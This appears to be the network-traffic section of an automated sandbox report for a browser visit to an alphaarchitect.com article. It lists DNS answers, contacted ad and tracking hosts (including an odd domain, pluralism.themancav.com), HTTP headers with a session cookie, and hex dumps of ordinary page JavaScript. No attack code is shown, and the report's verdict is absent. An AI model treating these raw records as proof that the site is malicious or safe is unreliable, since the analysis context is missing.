                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)idaas-ext.cph.liveintent.com52.3.70.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)idaas-ext.cph.liveintent.com54.80.88.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)idaas-ext.cph.liveintent.com35.169.51.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)idaas-ext.cph.liveintent.com3.208.153.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.701572895 CET1.1.1.1192.168.2.40x3daNo error (0)idaas-ext.cph.liveintent.com18.214.213.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:14.702047110 CET1.1.1.1192.168.2.40x6735No error (0)i.liadm.comidaas-ext.cph.liveintent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.356813908 CET1.1.1.1192.168.2.40xf7faNo error (0)tag.trovo-tag.comd1fdcqniejar0f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.356992960 CET1.1.1.1192.168.2.40x1d9eNo error (0)tag.trovo-tag.comd1fdcqniejar0f.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.356992960 CET1.1.1.1192.168.2.40x1d9eNo error (0)d1fdcqniejar0f.cloudfront.net3.164.85.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.356992960 CET1.1.1.1192.168.2.40x1d9eNo error (0)d1fdcqniejar0f.cloudfront.net3.164.85.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.356992960 CET1.1.1.1192.168.2.40x1d9eNo error (0)d1fdcqniejar0f.cloudfront.net3.164.85.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:15.356992960 CET1.1.1.1192.168.2.40x1d9eNo error (0)d1fdcqniejar0f.cloudfront.net3.164.85.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.563541889 CET1.1.1.1192.168.2.40x725bNo error (0)api2.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.563541889 CET1.1.1.1192.168.2.40x725bNo error (0)api2.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.566843987 CET1.1.1.1192.168.2.40x4f35No error (0)api2.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.571007967 CET1.1.1.1192.168.2.40x30b4No error (0)api.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.571007967 CET1.1.1.1192.168.2.40x30b4No error (0)api.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:17.571501970 CET1.1.1.1192.168.2.40x55e6No error (0)api.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.187628984 CET1.1.1.1192.168.2.40x3e33No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.187628984 CET1.1.1.1192.168.2.40x3e33No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.187628984 CET1.1.1.1192.168.2.40x3e33No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:18.187628984 CET1.1.1.1192.168.2.40x3e33No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.486402988 CET1.1.1.1192.168.2.40x433aNo error (0)api2.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.486402988 CET1.1.1.1192.168.2.40x433aNo error (0)api2.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.486999035 CET1.1.1.1192.168.2.40x9dafNo error (0)api.hcaptcha.com104.19.229.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.486999035 CET1.1.1.1192.168.2.40x9dafNo error (0)api.hcaptcha.com104.19.230.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.487379074 CET1.1.1.1192.168.2.40xcfabNo error (0)api.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.487591028 CET1.1.1.1192.168.2.40xec14No error (0)api2.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829144001 CET1.1.1.1192.168.2.40x351No error (0)thrtle.com34.233.219.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829144001 CET1.1.1.1192.168.2.40x351No error (0)thrtle.com52.6.98.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829144001 CET1.1.1.1192.168.2.40x351No error (0)thrtle.com54.225.117.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829144001 CET1.1.1.1192.168.2.40x351No error (0)thrtle.com52.204.65.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:19.829144001 CET1.1.1.1192.168.2.40x351No error (0)thrtle.com23.21.74.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 20, 2024 13:45:20.109935045 CET1.1.1.1192.168.2.40xc7abNo error (0)pluralism.themancav.com62.60.154.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        • alphaarchitect.com
                                                                                                                                                                                                                                                                        • https:
                                                                                                                                                                                                                                                                          • cdn.printfriendly.com
                                                                                                                                                                                                                                                                          • a.remarketstats.com
                                                                                                                                                                                                                                                                          • static.ads-twitter.com
                                                                                                                                                                                                                                                                          • www.printfriendly.com
                                                                                                                                                                                                                                                                          • a.clickcertain.com
                                                                                                                                                                                                                                                                          • t.co
                                                                                                                                                                                                                                                                          • analytics.twitter.com
                                                                                                                                                                                                                                                                          • stats.g.doubleclick.net
                                                                                                                                                                                                                                                                          • analytics.google.com
                                                                                                                                                                                                                                                                          • td.doubleclick.net
                                                                                                                                                                                                                                                                          • pluralism.themancav.com
                                                                                                                                                                                                                                                                          • js.hcaptcha.com
                                                                                                                                                                                                                                                                          • tag.trovo-tag.com
                                                                                                                                                                                                                                                                          • match.prod.bidr.io
                                                                                                                                                                                                                                                                          • a.usbrowserspeed.com
                                                                                                                                                                                                                                                                          • newassets.hcaptcha.com
                                                                                                                                                                                                                                                                          • pixel.tapad.com
                                                                                                                                                                                                                                                                          • i.liadm.com
                                                                                                                                                                                                                                                                          • api2.hcaptcha.com
                                                                                                                                                                                                                                                                          • api.hcaptcha.com
                                                                                                                                                                                                                                                                          • match.adsrvr.org
                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.449741141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC696OUTGET /2024/12/long-term-expected-returns/ HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:38 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Cookie
                                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 12:16:08 GMT
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        X-Cacheable: SHORT
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600, must-revalidate
                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                        X-Cache-Group: normal
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Set-Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg; path=/; expires=Fri, 20-Dec-24 13:14:38 GMT; domain=.alphaarchitect.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb994394ff5fa-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC541INData Raw: 37 63 37 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 61 76 61 64 61 2d 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 77 69 64 65 20 61 76 61 64 61 2d 68 74 6d 6c 2d 68 65 61 64 65 72 2d 70 6f 73 69 74 69 6f 6e 2d 74 6f 70 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 6d 61 74 63 68 28 2f 4d 53 49 45 7c 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2f 69 29 7c 7c 6e 61 76 69 67 61 74 6f 72 2e 75 73
                                                                                                                                                                                                                                                                        Data Ascii: 7c74<!DOCTYPE html><html class="avada-html-layout-wide avada-html-header-position-top" lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><script>if(navigator.userAgent.match(/MSIE|Internet Explorer/i)||navigator.us
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 28 22 23 22 29 3d 3d 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 68 72 65 66 2b 22 26 6e 6f 77 70 72 6f 63 6b 65 74 3d 31 22 7d 65 6c 73 65 7b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 68 72 65 66 2e 72 65 70 6c 61 63 65 28 22 23 22 2c 22 26 6e 6f 77 70 72 6f 63 6b 65 74 3d 31 23 22 29 7d 7d 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 28 29 3d 3e 7b 63 6c 61 73 73 20 52 6f 63 6b 65 74 4c 61 7a 79 4c 6f 61 64 53 63 72 69 70 74 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 76 3d 22 31 2e 32 2e 36 22 2c 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 3d 5b 22 6b 65 79 64 6f 77 6e 22 2c 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 22 6d 6f 75 73 65 6d 6f 76 65 22 2c
                                                                                                                                                                                                                                                                        Data Ascii: ("#")==-1){document.location.href=href+"&nowprocket=1"}else{document.location.href=href.replace("#","&nowprocket=1#")}}}}</script><script>(()=>{class RocketLazyLoadScripts{constructor(){this.v="1.2.6",this.triggerEvents=["keydown","mousedown","mousemove",
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 2e 75 73 65 72 45 76 65 6e 74 48 61 6e 64 6c 65 72 29 29 7d 5f 28 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 74 68 69 73 2e 75 73 65 72 45 76 65 6e 74 48 61 6e 64 6c 65 72 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 29 29 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 74 68 69 73 2e 75 73 65 72 45 76 65 6e 74 48 61 6e 64 6c 65 72 29 7d 69 28 74 29 7b 22 48 54 4d 4c 22 21 3d 3d 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 26 26 28 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63
                                                                                                                                                                                                                                                                        Data Ascii: .userEventHandler))}_(){this.triggerEvents.forEach((t=>window.removeEventListener(t,this.userEventHandler,{passive:!0}))),document.removeEventListener("visibilitychange",this.userEventHandler)}i(t){"HTML"!==t.target.tagName&&(window.addEventListener("touc
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 22 29 2c 74 68 69 73 2e 69 6e 74 65 72 63 65 70 74 65 64 43 6c 69 63 6b 73 2e 70 75 73 68 28 74 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 74 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 74 68 69 73 2e 4d 28 29 7d 4f 28 29 7b 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 73 74 61 72 74 22 2c 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 48 61 6e 64 6c 65 72 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 2c 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 74 68 69 73 2e 74 6f 75 63 68 53 74 61 72 74 48 61 6e 64 6c 65 72 29 2c
                                                                                                                                                                                                                                                                        Data Ascii: "),this.interceptedClicks.push(t),t.preventDefault(),t.stopPropagation(),t.stopImmediatePropagation(),this.M()}O(){window.removeEventListener("touchstart",this.touchStartHandler,{passive:!0}),window.removeEventListener("mousedown",this.touchStartHandler),
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 6c 65 74 20 69 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 72 6f 63 6b 65 74 2d 73 72 63 22 29 3b 69 66 28 69 26 26 21 69 2e 73 74 61 72 74 73 57 69 74 68 28 22 64 61 74 61 3a 22 29 29 7b 30 3d 3d 3d 69 2e 69 6e 64 65 78 4f 66 28 22 2f 2f 22 29 26 26 28 69 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 69 29 3b 74 72 79 7b 63 6f 6e 73 74 20 6f 3d 6e 65 77 20 55 52 4c 28 69 29 2e 6f 72 69 67 69 6e 3b 6f 21 3d 3d 6c 6f 63 61 74 69 6f 6e 2e 6f 72 69 67 69 6e 26 26 74 2e 70 75 73 68 28 7b 73 72 63 3a 6f 2c 63 72 6f 73 73 4f 72 69 67 69 6e 3a 65 2e 63 72 6f 73 73 4f 72 69 67 69 6e 7c 7c 22 6d 6f 64 75 6c 65 22 3d 3d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 72 6f 63 6b 65 74 2d 74 79 70 65 22 29 7d 29 7d
                                                                                                                                                                                                                                                                        Data Ascii: let i=e.getAttribute("data-rocket-src");if(i&&!i.startsWith("data:")){0===i.indexOf("//")&&(i=location.protocol+i);try{const o=new URL(i).origin;o!==location.origin&&t.push({src:o,crossOrigin:e.crossOrigin||"module"===e.getAttribute("data-rocket-type")})}
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 28 22 46 69 72 65 66 6f 78 2f 22 29 3e 30 7c 7c 22 22 3d 3d 3d 6e 61 76 69 67 61 74 6f 72 2e 76 65 6e 64 6f 72 7c 7c 74 68 69 73 2e 43 53 50 49 73 73 75 65 29 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 2c 5b 2e 2e 2e 74 2e 61 74 74 72 69 62 75 74 65 73 5d 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 6c 65 74 20 65 3d 74 2e 6e 6f 64 65 4e 61 6d 65 3b 22 74 79 70 65 22 21 3d 3d 65 26 26 28 22 64 61 74 61 2d 72 6f 63 6b 65 74 2d 74 79 70 65 22 3d 3d 3d 65 26 26 28 65 3d 22 74 79 70 65 22 29 2c 22 64 61 74 61 2d 72 6f 63 6b 65 74 2d 73 72 63 22 3d 3d 3d 65 26 26 28 65 3d 22 73 72 63 22 29 2c 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 65 2c 74 2e 6e 6f 64 65 56 61 6c 75 65 29 29 7d 29 29 2c 74 2e 74 65
                                                                                                                                                                                                                                                                        Data Ascii: ("Firefox/")>0||""===navigator.vendor||this.CSPIssue)i=document.createElement("script"),[...t.attributes].forEach((t=>{let e=t.nodeName;"type"!==e&&("data-rocket-type"===e&&(e="type"),"data-rocket-src"===e&&(e="src"),i.setAttribute(e,t.nodeValue))})),t.te
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 79 65 64 53 63 72 69 70 74 73 2e 64 65 66 65 72 2c 2e 2e 2e 74 68 69 73 2e 64 65 6c 61 79 65 64 53 63 72 69 70 74 73 2e 61 73 79 6e 63 5d 2c 22 70 72 65 6c 6f 61 64 22 29 7d 54 28 74 2c 65 29 7b 76 61 72 20 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 72 6f 63 6b 65 74 2d 73 72 63 22 29 7c 7c 74 2e 73 72 63 3b 69 66 28 6f 26 26 21 6f 2e 73 74 61 72 74 73 57 69 74 68 28 22 64 61 74 61 3a 22 29 29 7b 63 6f 6e 73 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6c 69 6e 6b 22 29 3b 73
                                                                                                                                                                                                                                                                        Data Ascii: yedScripts.defer,...this.delayedScripts.async],"preload")}T(t,e){var i=document.createDocumentFragment();t.forEach((t=>{const o=t.getAttribute&&t.getAttribute("data-rocket-src")||t.src;if(o&&!o.startsWith("data:")){const s=document.createElement("link");s
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 70 61 67 65 73 68 6f 77 22 29 3b 74 72 79 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 64 6f 63 75 6d 65 6e 74 2c 22 72 65 61 64 79 53 74 61 74 65 22 2c 7b 67 65 74 3a 28 29 3d 3e 74 2e 72 6f 63 6b 65 74 52 65 61 64 79 53 74 61 74 65 2c 73 65 74 28 65 29 7b 74 2e 72 6f 63 6b 65 74 52 65 61 64 79 53 74 61 74 65 3d 65 7d 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3d 22 6c 6f 61 64 69 6e 67 22 7d 63 61 74 63 68 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 57 50 52 6f 63 6b 65 74 20 44 4a 45 20 72 65 61 64 79 53 74 61 74 65 20 63 6f 6e 66 6c 69 63 74 2c 20 62 79 70 61 73 73 69 6e 67 22 29 7d 7d 46 28 74 29 7b 6c 65 74 20 65 3b 66 75 6e 63 74 69 6f 6e 20 69 28
                                                                                                                                                                                                                                                                        Data Ascii: pageshow");try{Object.defineProperty(document,"readyState",{get:()=>t.rocketReadyState,set(e){t.rocketReadyState=e},configurable:!0}),document.readyState="loading"}catch(t){console.log("WPRocket DJE readyState conflict, bypassing")}}F(t){let e;function i(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 7d 63 61 74 63 68 28 74 29 7b 7d 61 77 61 69 74 20 74 68 69 73 2e 47 28 29 2c 64 6f 63 75 6d 65 6e 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 72 6f 63 6b 65 74 2d 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 29 29 2c 61 77 61 69 74 20 74 68 69 73 2e 47 28 29 2c 64 6f 63 75 6d 65 6e 74 2e 72 6f 63 6b 65 74 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 26 26 64 6f 63 75 6d 65 6e 74 2e 72 6f 63 6b 65 74 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 28 29 2c 61 77 61 69 74 20 74 68 69 73 2e 47 28 29 2c 64 6f 63 75 6d 65 6e 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 45 76 65 6e 74 28 22 72 6f 63 6b 65 74 2d 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 29 29 2c 61 77 61 69 74 20
                                                                                                                                                                                                                                                                        Data Ascii: }catch(t){}await this.G(),document.dispatchEvent(new Event("rocket-readystatechange")),await this.G(),document.rocketonreadystatechange&&document.rocketonreadystatechange(),await this.G(),document.dispatchEvent(new Event("rocket-DOMContentLoaded")),await
                                                                                                                                                                                                                                                                        2024-12-20 12:44:38 UTC1369INData Raw: 6e 67 2c 74 2e 73 65 74 28 69 2c 6e 29 29 3b 63 6f 6e 73 74 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 6f 2e 73 65 74 53 74 61 72 74 28 63 2c 30 29 2c 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 75 61 6c 46 72 61 67 6d 65 6e 74 28 65 29 29 2c 73 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 63 2c 6e 29 7d 7d 61 73 79 6e 63 20 47 28 29 7b 44 61 74 65 2e 6e 6f 77 28 29 2d 74 68 69 73 2e 6c 61 73 74 42 72 65 61 74 68 3e 34 35 26 26 28 61 77 61 69 74 20 74 68 69 73 2e 4b 28 29 2c 74 68 69 73 2e 6c 61 73 74 42 72 65 61 74 68 3d 44 61 74 65 2e 6e 6f 77 28 29 29 7d 61 73 79 6e 63 20 4b 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65
                                                                                                                                                                                                                                                                        Data Ascii: ng,t.set(i,n));const c=document.createDocumentFragment();o.setStart(c,0),c.appendChild(o.createContextualFragment(e)),s.insertBefore(c,n)}}async G(){Date.now()-this.lastBreath>45&&(await this.K(),this.lastBreath=Date.now())}async K(){return document.hidde


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        1192.168.2.449740141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC826OUTGET /wp-content/themes/Avada/includes/lib/assets/fonts/icomoon/awb-icons.woff HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        Origin: https://alphaarchitect.com
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:39 UTC425INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:39 GMT
                                                                                                                                                                                                                                                                        Content-Type: font/woff
                                                                                                                                                                                                                                                                        Content-Length: 20884
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 24 Oct 2024 14:49:56 GMT
                                                                                                                                                                                                                                                                        ETag: "671a5e94-5194"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147797
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb999880141f8-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
